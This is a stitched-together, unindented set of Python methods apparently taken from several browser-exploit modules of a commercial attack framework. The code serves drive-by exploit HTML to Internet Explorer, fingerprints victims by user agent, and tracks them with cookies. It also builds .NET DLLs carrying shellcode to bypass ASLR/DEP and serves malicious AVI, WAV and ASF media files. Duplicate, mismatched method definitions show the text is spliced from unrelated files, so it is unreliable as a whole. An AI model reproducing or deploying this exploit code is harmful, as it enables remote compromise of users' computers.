def run(self):
if (self.version == 0):
filedata=self.makefile('','Windows XP')
dlldata =""
elif (self.version ==1):
filedata=self.makefile('MSIE 7.0','')
self.vProtect = True # Needed for this type of payload
p = PElib()
dlldata = p.createDotNETPEFileBuf(self.createShellcode(), self.pc)
self.vProtect = False # Reset this
elif (self.version ==2):
filedata=self.makefile('MSIE 8.0','')
p = PElib()
dlldata = p.createDotNETPEFileBuf("", self.pc)
outputfile = wp_outputpath(self.filename)
self.log("WP> Opening %s"%outputfile )
fd=file(outputfile,'wb+')
fd.write(filedata)
fd.close()
self.log('WP> Wrote to %s'%outputfile)
if dlldata != "":
dllfile = wp_outputpath(self.filename.replace('html','dll'))
# create the dll file
f = open(dllfile,'wb')
f.write(dlldata)
f.flush()
f.close
self.log('WP> Created DLL file %s'%dllfile)
return 1
def makesploit(self, clientheader, clientbody):
self.createShellcode()
# The main call from ClientD
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
self.log('WP> ****************************************')
self.log("WP> URL Received: %s" % clientheader.URL)
user_agent = clientheader.getStrValue(['User-Agent'])
# Get details
browser, osversion = wp_browserinfo(user_agent)
self.log('WP> OSVersion: %s' % osversion)
self.log('WP> Browser: %s' % browser)
self.log('WP> ')
#self.log('WP> User agent of connecting host: %s' % user_agent)
if clientheader.URL.count(self.filename):
self.log('WP> Serving exploit html file')
data = self.makefile(browser, osversion)
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
h.addHeader('Set-Cookie',
'SessionID=%d' % self.jsObfuscator.getXORKey())
elif (clientheader.URL.count('.dll')):
if browser == "MSIE 7.0":
self.log('WP> Serving IE7 .Net DLL file')
self.vProtect = True # Needed for this type of payload
p = PElib()
data = p.createDotNETPEFileBuf(self.createShellcode(), self.pc)
self.vProtect = False # Reset this
else:
self.log('WP> Serving IE8 .Net DLL file')
p = PElib()
data = p.createDotNETPEFileBuf("", self.pc)
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'application/octet-stream')
else:
self.log('WP> Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
self.log('WP> ****************************************')
return h, b
def makefile(self, clientheader):
"""Makes the actual bad html file to trigger the buffer overflow"""
if "exploit.dll" in clientheader.URL:
self.log("SENDING .NET DLL...................")
from pelib import PElib
p = PElib()
"""
438242F4 8B08 MOV ECX,DWORD PTR DS:[EAX] ; EAX=41414141
438242F6 57 PUSH EDI
438242F7 50 PUSH EAX
438242F8 FF91 84000000 CALL DWORD PTR DS:[ECX+84] ; ECX = 414140C1
"""
return p.createDotNETPEFileBuf("\xC1\x40\x41\x41" + "\x49\x41\x41\x41" + self.createShellcode(), 0x41414141)
else:
self.log("SENDING HTML...................")
import random
html = """
<html>
<body>
<script>
document.write("<object classid='%dexploit.dll#exploit.Shellcode'></object><XML ID=I><X><C><![CDATA[<image SRC=http://䅁䅁.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><HTML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN></HTML>");
</script>
</body>
</html>
"""%(random.randint(0,65535))
return html
def makesploit(self, clientheader, clientbody):
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
# .NET DLL request
if clientheader.URL.count("d2.dll"):
self.log("Sending .NET DLL file")
p = PElib()
sploitstring = p.createDotNETPEFileBuf(
("\x90" * 0xd000) + self.createShellcode(), 0x74000000)
h.addHeader('Content-Type', 'application/octet-stream')
b.setBody(sploitstring)
# AVI file request
elif clientheader.URL.count(self.avifile):
self.log("Sending AVI file")
f = open(
os.getcwd() + "/3rdparty/D2SEC/exploits/d2sec_directshow/" +
self.avifile, "rb")
sploitstring = f.read()
f.close()
h.addHeader('Content-Type', 'application/octet-stream')
b.setBody(sploitstring)
# Index file request
else:
sploitstring = self.makefile()
h.addHeader('Content-Type', 'text/html')
b.setBody(sploitstring)
return h, b
def makefileIE7_part2(self):
# Exploit for Windows Vista IE 7
# This part returns the created .net dll
# .Net DLL ASLR/DEP Bypass
p = PElib()
filedata = p.createDotNETPEFileBuf(self.createShellcode(), self.pc)
return filedata
def makefile(self, clientheader):
if self.dllfile in clientheader.URL:
self.log('[+] Sending .NET DLL')
p = PElib()
return p.createDotNETPEFileBuf(self.createShellcode(), self.pc)
elif self.wavfile in clientheader.URL:
self.log('[+] Sending WAV file')
return self.generate_wav()
else:
self.log('[+] Sending HTML file')
html = """<html>
<body>
<OBJECT CLASSID='%d%s#exploit.Shellcode'></OBJECT>
<EMBED src="%s" autostart=true loop=false volume=100 hidden=true>
<NOEMBED>
<BGSOUND src="%s">
</NOEMBED>
</body>
</html>""" % (random.randint(0,
65535), self.dllfile, self.wavfile, self.wavfile)
return html
def makefile(self, clientheader):
if self.dllfile in clientheader.URL:
self.log('[+] Sending .NET DLL')
p = PElib()
return p.createDotNETPEFileBuf(self.createShellcode(), self.pc)
elif self.wmafile in clientheader.URL:
self.log('[+] Sending ASF file')
wma = ''
try:
fd = open(self.wmasrc, 'rb')
wma = fd.read()
fd.close()
except:
self.log('[-] Could not read ASF file!')
return wma
else:
self.log('[+] Sending HTML file')
html = """<html>
<body>
<OBJECT CLASSID='%d%s#exploit.Shellcode'></OBJECT>
<OBJECT ID="MediaPlayer" CLASSID="CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95" CODEBASE="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab# Version=5,1,52,701" STANDBY="Loading Microsoft Windows Media Player components..." TYPE="application/x-oleobject" width="280" height="46">
<param name="fileName" value="%s">
<param name="animationatStart" value="true">
<param name="transparentatStart" value="true">
<param name="autoStart" value="true">
<param name="showControls" value="true">
<param name="Volume" value="-300">
<embed type="application/x-mplayer2" pluginspage="http://www.microsoft.com/Windows/MediaPlayer/" src="%s" name="MediaPlayer" width=280 height=46 autostart=1 showcontrols=1 volume=-300>
</OBJECT>
</body>
</html>""" % (random.randint(0,
65535), self.dllfile, self.wmafile, self.wmafile)
return html
def makesploit(self, clientheader, clientbody):
self.createShellcode()
# The main call from ClientD
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
self.log('WP> ****************************************')
self.log("WP> URL Received: %s" % clientheader.URL)
user_agent = clientheader.getStrValue(['User-Agent'])
cookies = clientheader.getStrValue(['Cookie'])
# Get details
browser, osversion = wp_browserinfo(user_agent)
self.log('WP> OSVersion: %s' % osversion)
self.log('WP> Browser: %s' % browser)
self.log('WP> ')
#self.log('WP> User agent of connecting host: %s' % user_agent)
#self.log('WP> Cookies of connecting host: %s' % cookies)
if clientheader.URL.count(self.filename):
if cookies.count("SessionID"):
self.log('WP> Exploit already sent to this client')
self.log('WP> Returning blank page')
data = ""
else:
self.log('WP> Serving exploit html file')
data = self.makefile(browser, osversion)
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
h.addHeader('Set-Cookie',
'SessionID=%d' % self.jsObfuscator.getXORKey())
elif (clientheader.URL.count('.dll')):
p = PElib()
if browser == "MSIE 7.0":
self.log('WP> Serving IE7 .Net DLL file')
self.vProtect = True # Needed for this type of payload
data = p.createDotNETPEFileBuf(self.createShellcode(), self.pc)
self.vProtect = False # Reset this
else:
self.log('WP> Serving IE8 .Net DLL file')
data = p.createDotNETPEFileBuf("", self.pc)
b.setBody(data)
h.addHeader('Content-Type', 'application/octet-stream')
elif (clientheader.URL.count('.2.html')):
if cookies.count("SessionID2"):
self.log('WP> Exploit already sent to this client')
self.log('WP> Returning blank page')
data = ""
else:
self.log('WP> Serving exploit secondary file')
if browser == "MSIE 7.0":
data = self.makefileIE7(2)
else:
data = self.makefileIE8_VistaWin7(2)
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
h.addHeader('Set-Cookie',
'SessionID2=%d' % self.jsObfuscator.getXORKey())
elif (clientheader.URL.count('iexplore.exe.config')):
self.log('WP> Returning blank page')
b.setBody("")
h.addHeader('Content-Type', 'text/html')
elif (clientheader.URL.count('jreVerify.class')):
self.log('WP> Returning blank page')
b.setBody("")
h.addHeader('Content-Type', 'text/html')
elif (clientheader.URL.count('favicon.ico')):
self.log('WP> Returning blank page')
b.setBody("")
h.addHeader('Content-Type', 'text/html')
else:
self.log('WP> Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
self.log('WP> ****************************************')
return h, b